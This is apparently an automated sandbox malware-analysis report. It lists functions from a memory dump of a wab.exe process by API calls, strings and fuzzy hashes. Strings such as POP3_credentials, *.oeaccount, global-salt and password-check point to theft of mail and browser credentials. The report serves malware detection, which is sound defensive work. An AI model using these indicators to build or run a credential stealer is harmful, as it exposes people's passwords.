• EndDeferWindowPos.USER32(?), ref: 0040B941
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: Window$Defer$Rect$BeginClient
• String ID:
• API String ID: 2126104762-0
• Opcode ID: f6309ff644c12743b91cf70e9e807ca9d204e09485dec5c7f95147756245f13c
• Instruction ID: cf9ea3ecf4623016fd9dc3f5f3f1318dd3ce101ba80f5eccba740e206150479f
• Opcode Fuzzy Hash: f6309ff644c12743b91cf70e9e807ca9d204e09485dec5c7f95147756245f13c
• Instruction Fuzzy Hash: F221C276A00609FFDF118FA8DD89FEEBBB9FB08700F104065FA55A2160C7716A519F24
Uniqueness Score: -1.00%

APIs
• GetSystemMetrics.USER32(00000011), ref: 00407076
• GetSystemMetrics.USER32(00000010), ref: 0040707C
• GetDC.USER32(00000000), ref: 0040708A
• GetDeviceCaps.GDI32(00000000,00000008), ref: 0040709C
• GetDeviceCaps.GDI32(004012E4,0000000A), ref: 004070A5
• ReleaseDC.USER32(00000000,004012E4), ref: 004070AE
• GetWindowRect.USER32(004012E4,?), ref: 004070BB
• MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407100
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
• String ID:
• API String ID: 1999381814-0
• Opcode ID: 9f21f5323b7ceedafff5760536b34980224d30b32341e91405141b8b8f897059
• Instruction ID: 4d379cb21657894a0e11cf9a22620d5233689a1bec75a9944306807f4dd79964
• Opcode Fuzzy Hash: 9f21f5323b7ceedafff5760536b34980224d30b32341e91405141b8b8f897059
• Instruction Fuzzy Hash: 8F11B735E00619AFDF108FB8CC49BAF7F79EB45351F040135EE01E7291DA70A9048A91
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: memcpymemset
• String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
• API String ID: 1297977491-3883738016
• Opcode ID: ec180b53c73d386f260fbd60f4e29b72e3bb9c2a6b5e225ae3417af3491c72e6
• Instruction ID: fc76bc8343265493366407fdb1c4d707e5d8df4650a3499163c8513785776b89
• Opcode Fuzzy Hash: ec180b53c73d386f260fbd60f4e29b72e3bb9c2a6b5e225ae3417af3491c72e6
• Instruction Fuzzy Hash: 64128B71A04629DFDB14CF69E481AADBBB1FF08314F54419AE805AB341D738B982CF99
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: memcpymemset$strlen$_memicmp
• String ID: user_pref("
• API String ID: 765841271-2487180061
• Opcode ID: 7a1adde69f0e08c2e228f59276f9fb0b6105cf7cc96dfcb17d977d75f3f89509
• Instruction ID: 5a65487526c3994ab00424e18f338503154a615df115d4cfef8f26f9df640fc7
• Opcode Fuzzy Hash: 7a1adde69f0e08c2e228f59276f9fb0b6105cf7cc96dfcb17d977d75f3f89509
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F419AB6904118AEDB10DB95DC81FDA77AC9F44314F1042FBE605F7181EA38AF498FA9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405813
                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 0040582C
                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 00405839
                                                                                                                                                                                                                      • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405845
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004058AF
                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001019,?,?), ref: 004058E0
                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 00405965
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4281309102-0
                                                                                                                                                                                                                      • Opcode ID: 876f99dafb0e6a95d69d5b7461b0350726d0b63ba9d27f7b5ed0e67933d6ba92
                                                                                                                                                                                                                      • Instruction ID: b1c021a56b4f7756f2b42baa300122e183270d3e6e7f1cb1ff0d1441efe58172
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 876f99dafb0e6a95d69d5b7461b0350726d0b63ba9d27f7b5ed0e67933d6ba92
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 98411BB5D00109AFEB209F95DC81DAEBBB9FF04354F00406AE914B72A1D7759E50CFA4
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
                                                                                                                                                                                                                        • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 0040A65B
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040A67D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileWrite_mbscatsprintfstrlen
                                                                                                                                                                                                                      • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                                                      • API String ID: 1631269929-4153097237
                                                                                                                                                                                                                      • Opcode ID: 0a1c5f3df8c0410e4819bffe23f535fd28423f127cd07168cb4d0992b4b9d367
                                                                                                                                                                                                                      • Instruction ID: 832b2c653fc05485a7f242a7eb3c8d8175a8ee497f4c95e58b3f18e695e9ea43
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0a1c5f3df8c0410e4819bffe23f535fd28423f127cd07168cb4d0992b4b9d367
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE31AE31900218AFDF15DF94C8869DE7BB5FF45320F10416AFD11BB292DB76AA51CB84
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 00408BA2
                                                                                                                                                                                                                        • Part of subcall function 00408FB1: _itoa.MSVCRT ref: 00408FD2
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00408BC0
                                                                                                                                                                                                                      • LoadStringA.USER32(00000000,00000006,?,?), ref: 00408BF0
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 00408C2F
                                                                                                                                                                                                                        • Part of subcall function 00408AA5: ??2@YAPAXI@Z.MSVCRT ref: 00408ACD
                                                                                                                                                                                                                        • Part of subcall function 00408AA5: ??2@YAPAXI@Z.MSVCRT ref: 00408AEB
                                                                                                                                                                                                                        • Part of subcall function 00408AA5: ??2@YAPAXI@Z.MSVCRT ref: 00408B09
                                                                                                                                                                                                                        • Part of subcall function 00408AA5: ??2@YAPAXI@Z.MSVCRT ref: 00408B19
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00408B3B
                                                                                                                                                                                                                      • strings, xrefs: 00408B98
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@$LoadString_itoa_mbscpymemcpystrlen
                                                                                                                                                                                                                      • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$strings
                                                                                                                                                                                                                      • API String ID: 4036804644-4125592482
                                                                                                                                                                                                                      • Opcode ID: 2ef5bdd7b6553c1411f0866e16a237609f5efe4191e7d453619a5ad3a1a82c98
                                                                                                                                                                                                                      • Instruction ID: 2fb35d0cb8d6515d264437a76ba5de351b7eb647a908b3ccb3b2e5853623431c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2ef5bdd7b6553c1411f0866e16a237609f5efe4191e7d453619a5ad3a1a82c98
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9F3136B95003019FEB149B18EE40E323776EB59346B14443EF845A72B3DB39E815CB5C
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00407E84
                                                                                                                                                                                                                        • Part of subcall function 00410475: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040264A,?), ref: 0041048B
                                                                                                                                                                                                                        • Part of subcall function 00404666: _mbscpy.MSVCRT ref: 004046B5
                                                                                                                                                                                                                        • Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                                                                                                                                                                                                        • Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00408018,?,000000FD,00000000,00000000,?,00000000,00408018,?,?,?,?,00000000), ref: 00407F1F
                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,?,00000000,7651E430,?), ref: 00407F2F
                                                                                                                                                                                                                        • Part of subcall function 00410452: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C69,?,?,?,?,00401C69,?,?,?), ref: 0041046D
                                                                                                                                                                                                                        • Part of subcall function 00406CA4: strlen.MSVCRT ref: 00406CA9
                                                                                                                                                                                                                        • Part of subcall function 00406CA4: memcpy.MSVCRT ref: 00406CBE
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                                                                                                                                                      • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                                                                                                                                                      • API String ID: 524865279-2190619648
                                                                                                                                                                                                                      • Opcode ID: bb8a79189eebe21ea9a309b84d13f13660712c6c97ce44d04bc2eb4e66ed4208
                                                                                                                                                                                                                      • Instruction ID: 2c282e6ff88bd57be97cdb9cd65414afbc0c2375aa853475002addcb7488d922
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bb8a79189eebe21ea9a309b84d13f13660712c6c97ce44d04bc2eb4e66ed4208
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 75316075A4025DAFDB11EB69CC81AEEBBBCEF45314F0080B6FA04A3141D6789F498F65
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: ItemMenu$CountInfomemsetstrchr
• String ID: 0$6
• API String ID: 2300387033-3849865405
• Opcode ID: 99e79691bf6533de20a974ac65a5fcf95ef7575eddab1868be2d8be4df739519
• Instruction ID: 102fedc8b068d714547c44678b24ea6bae60c59159463c21af6927f9d555436f
• Opcode Fuzzy Hash: 99e79691bf6533de20a974ac65a5fcf95ef7575eddab1868be2d8be4df739519
• Instruction Fuzzy Hash: B8210F71108380AFE7108F61D889A5FB7E8FB85344F04093FF684A6282E779DD048B5A
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: memcpystrlen$memsetsprintf
• String ID: %s (%s)
• API String ID: 3756086014-1363028141
• Opcode ID: 4357e9335d32c2bf08e92843452a3ff925627b6c59b5d6ec26037838f45d6104
• Instruction ID: 49fd0969a141bf365c85b2e85b726abfc67c7a4f8a3ab277a670c68284d415ec
• Opcode Fuzzy Hash: 4357e9335d32c2bf08e92843452a3ff925627b6c59b5d6ec26037838f45d6104
• Instruction Fuzzy Hash: 9A1193B1800118AFEB21DF59CD45F99B7ACEF41308F008466FA48EB106D275AB15CB95
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00406A9F: CreateFileA.KERNEL32(R7D,80000000,00000001,00000000,00000003,00000000,00000000,0044368E,?,.8D,00443752,?,?,*.oeaccount,.8D,?), ref: 00406AB1
• GetFileSize.KERNEL32(00000000,00000000,?,00000000,.8D,00443752,?,?,*.oeaccount,.8D,?,00000104), ref: 0044369D
• ??2@YAPAXI@Z.MSVCRT ref: 004436AF
• SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004436BE
  • Part of subcall function 004072EF: ReadFile.KERNEL32(00000000,?,004436D1,00000000,00000000,?,?,004436D1,?,00000000), ref: 00407306
  • Part of subcall function 00443546: wcslen.MSVCRT ref: 00443559
  • Part of subcall function 00443546: ??2@YAPAXI@Z.MSVCRT ref: 00443562
  • Part of subcall function 00443546: WideCharToMultiByte.KERNEL32(00000000,00000000,004436E8,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004436E8,?,00000000), ref: 0044357B
  • Part of subcall function 00443546: strlen.MSVCRT ref: 004435BE
  • Part of subcall function 00443546: memcpy.MSVCRT ref: 004435D8
  • Part of subcall function 00443546: ??3@YAXPAX@Z.MSVCRT ref: 0044366B
• ??3@YAXPAX@Z.MSVCRT ref: 004436E9
• CloseHandle.KERNEL32(?), ref: 004436F3
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
• String ID: .8D
• API String ID: 1886237854-2881260426
• Opcode ID: e9accfc59e3ea295214b65d31af1a641a7a6f9c6ce4573a7963a3bdc594cfe72
• Instruction ID: b4a99ca98ea4b9fd05b978b53b3f03ecc28babd8507da3569ede40c7aa85cfb3
• Opcode Fuzzy Hash: e9accfc59e3ea295214b65d31af1a641a7a6f9c6ce4573a7963a3bdc594cfe72
• Instruction Fuzzy Hash: 42012432804248BFEB206F75EC4ED9FBB6CEF46364B10812BF81487261DA358D14CA28
Uniqueness

Uniqueness Score: -1.00%

APIs
• memcpy.MSVCRT ref: 00441F4B
  • Part of subcall function 00441A6C: memcmp.MSVCRT ref: 00441AB5
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: memcmpmemcpy
• String ID: BINARY$NOCASE$RTRIM$main$temp
• API String ID: 1784268899-4153596280
• Opcode ID: 6b6b8ae9c0e91365de8150e640e5bb5f4ec7e5282d2e56bc441d5ca3420a582e
• Instruction ID: db602eaa8e833254b0c0c9be43f42c24c685b457dfa8f14c56b0ec28138b2128
• Opcode Fuzzy Hash: 6b6b8ae9c0e91365de8150e640e5bb5f4ec7e5282d2e56bc441d5ca3420a582e
• Instruction Fuzzy Hash: 5091E2B1900700AFE730AF25C981A9EBBE5AB44304F14492FF14697392C7B9A985CB59
Uniqueness

Uniqueness Score: -1.00%

APIs
• OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040F7DE,00000000,?), ref: 0040FB5E
• memset.MSVCRT ref: 0040FBBB
• memset.MSVCRT ref: 0040FBCD
  • Part of subcall function 0040FA44: _mbscpy.MSVCRT ref: 0040FA6A
• memset.MSVCRT ref: 0040FCB4
• _mbscpy.MSVCRT ref: 0040FCD9
• CloseHandle.KERNEL32(?,0040F7DE,?), ref: 0040FD23
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: memset$_mbscpy$CloseHandleOpenProcess
• String ID:
• API String ID: 3974772901-0
• Opcode ID: 4ad987a4bc41c02407afd48bd51c39f8f43132cb09b5aa7545cf57ad8340978a
• Instruction ID: 4cd0dab2c11de29b1205cc267bdcfe4bbed2ca853fb67bca61950d18440e6937
• Opcode Fuzzy Hash: 4ad987a4bc41c02407afd48bd51c39f8f43132cb09b5aa7545cf57ad8340978a
• Instruction Fuzzy Hash: 79511EB590021CABDB60DF95DD85ADEBBB8FF44305F1000BAE609A2281D7759E84CF69
Uniqueness

Uniqueness Score: -1.00%

APIs
• wcslen.MSVCRT ref: 00443559
• ??2@YAPAXI@Z.MSVCRT ref: 00443562
• WideCharToMultiByte.KERNEL32(00000000,00000000,004436E8,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004436E8,?,00000000), ref: 0044357B
  • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 0044288D
  • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 004428AB
  • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 004428C6
  • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 004428EF
  • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 00442913
• strlen.MSVCRT ref: 004435BE
  • Part of subcall function 004429E9: ??3@YAXPAX@Z.MSVCRT ref: 004429F4
  • Part of subcall function 004429E9: ??2@YAPAXI@Z.MSVCRT ref: 00442A03
• memcpy.MSVCRT ref: 004435D8
• ??3@YAXPAX@Z.MSVCRT ref: 0044366B
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
• String ID:
• API String ID: 577244452-0
• Opcode ID: 4370cab8d1ed043324ede4dc3b9a4d06d61cdd8212607e5f6e8765e25bb93f57
• Instruction ID: ed198900897cbedb477538fc3de06edee324e7a25cf08c3aedaf46951cf6a217
• Opcode Fuzzy Hash: 4370cab8d1ed043324ede4dc3b9a4d06d61cdd8212607e5f6e8765e25bb93f57
• Instruction Fuzzy Hash: 14318672804219AFEF21EF65C8819DEBBB5EF45314F5480AAF108A3200CB396F84DF49
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00406CA4: strlen.MSVCRT ref: 00406CA9
  • Part of subcall function 00406CA4: memcpy.MSVCRT ref: 00406CBE
• _strcmpi.MSVCRT ref: 004044FA
• _strcmpi.MSVCRT ref: 00404518
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: _strcmpi$memcpystrlen
• String ID: imap$pop3$smtp
                                                                                                                                                                                                                      • API String ID: 2025310588-821077329
                                                                                                                                                                                                                      • Opcode ID: 4172489bfdd0b02c38134a290eb16c247b5a863f83d9230e12e3431aa9a1b902
                                                                                                                                                                                                                      • Instruction ID: ee17be80c36da3591ff53c386c7625c128025028662cc5e87d89578f4f8b6d75
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4172489bfdd0b02c38134a290eb16c247b5a863f83d9230e12e3431aa9a1b902
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C42196B25046189BEB51DB15CD417DAB3FCEF90304F10006BE79AB7181DB787B498B59
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040BD88
                                                                                                                                                                                                                        • Part of subcall function 00408B27: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408BF0
                                                                                                                                                                                                                        • Part of subcall function 00408B27: memcpy.MSVCRT ref: 00408C2F
                                                                                                                                                                                                                        • Part of subcall function 00408B27: _mbscpy.MSVCRT ref: 00408BA2
                                                                                                                                                                                                                        • Part of subcall function 00408B27: strlen.MSVCRT ref: 00408BC0
                                                                                                                                                                                                                        • Part of subcall function 00407446: memset.MSVCRT ref: 00407466
                                                                                                                                                                                                                        • Part of subcall function 00407446: sprintf.MSVCRT ref: 00407493
                                                                                                                                                                                                                        • Part of subcall function 00407446: strlen.MSVCRT ref: 0040749F
                                                                                                                                                                                                                        • Part of subcall function 00407446: memcpy.MSVCRT ref: 004074B4
                                                                                                                                                                                                                        • Part of subcall function 00407446: strlen.MSVCRT ref: 004074C2
                                                                                                                                                                                                                        • Part of subcall function 00407446: memcpy.MSVCRT ref: 004074D2
                                                                                                                                                                                                                        • Part of subcall function 00407279: _mbscpy.MSVCRT ref: 004072DF
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                                                                                                                                      • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                                                                      • API String ID: 2726666094-3614832568
                                                                                                                                                                                                                      • Opcode ID: dc175560a6198b9798b44ce5f971e01ac777fcc381b56c1877e1d198c2103063
                                                                                                                                                                                                                      • Instruction ID: 9cc38d581f61d2a6594629c27ef9ad5a8c62d4d42b688fbaa09f609bba3e4d8d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dc175560a6198b9798b44ce5f971e01ac777fcc381b56c1877e1d198c2103063
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0121FBB1C002599ADB40EFA5D981BDDBBB4AB08308F10517EF548B6281DB382A45CB9E
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403A78
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403A91
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AA8
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AC7
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00403AD9
                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AEA
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1786725549-0
                                                                                                                                                                                                                      • Opcode ID: e58b70ba74cd0776df0cd714b6ebe3d4fb4c03e2cd7b5e97725e455eaa9c95ba
                                                                                                                                                                                                                      • Instruction ID: 3c11530c7ff43e2cab0ee1a3c4b7d34204fc8064c5823527b9b114d7af9e1f20
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e58b70ba74cd0776df0cd714b6ebe3d4fb4c03e2cd7b5e97725e455eaa9c95ba
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 50112DBA80412CBFFB10AB94DC85EEBB3ADEF09355F0001A6B715D2092D6359F548B78
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,?), ref: 0040BEB8
                                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040BECA
                                                                                                                                                                                                                      • GetTempFileNameA.KERNEL32(?,00446634,00000000,?), ref: 0040BEEC
                                                                                                                                                                                                                      • OpenClipboard.USER32(?), ref: 0040BF0C
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0040BF25
                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 0040BF42
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2014771361-0
                                                                                                                                                                                                                      • Opcode ID: f1e64fb6be10128bbee6f3e595a742589036f7cac5447e39c680a47d04657e65
                                                                                                                                                                                                                      • Instruction ID: 907fbb9bc954c15d9eb0ad6f98a85717611d4d669dd49ad048df0fde8b6b2f4b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f1e64fb6be10128bbee6f3e595a742589036f7cac5447e39c680a47d04657e65
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5B11A1B6900218ABDF20AB61DC49FDB77BCAB11701F0000B6B685E2092DBB499C48F68
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 00406129
                                                                                                                                                                                                                        • Part of subcall function 00406057: memcmp.MSVCRT ref: 00406075
                                                                                                                                                                                                                        • Part of subcall function 00406057: memcpy.MSVCRT ref: 004060A4
                                                                                                                                                                                                                        • Part of subcall function 00406057: memcpy.MSVCRT ref: 004060B9
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 00406154
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 0040617C
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 00406199
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcmp$memcpy
                                                                                                                                                                                                                      • String ID: global-salt$password-check
                                                                                                                                                                                                                      • API String ID: 231171946-3927197501
                                                                                                                                                                                                                      • Opcode ID: e64782263ff5605526e0fe757cea6ed3191f710ccf3b0afa5e67e353afe61262
                                                                                                                                                                                                                      • Instruction ID: 655c6eb068c7835b63414ef3c9938ae25085d91347c247b77763f6b5778615a8
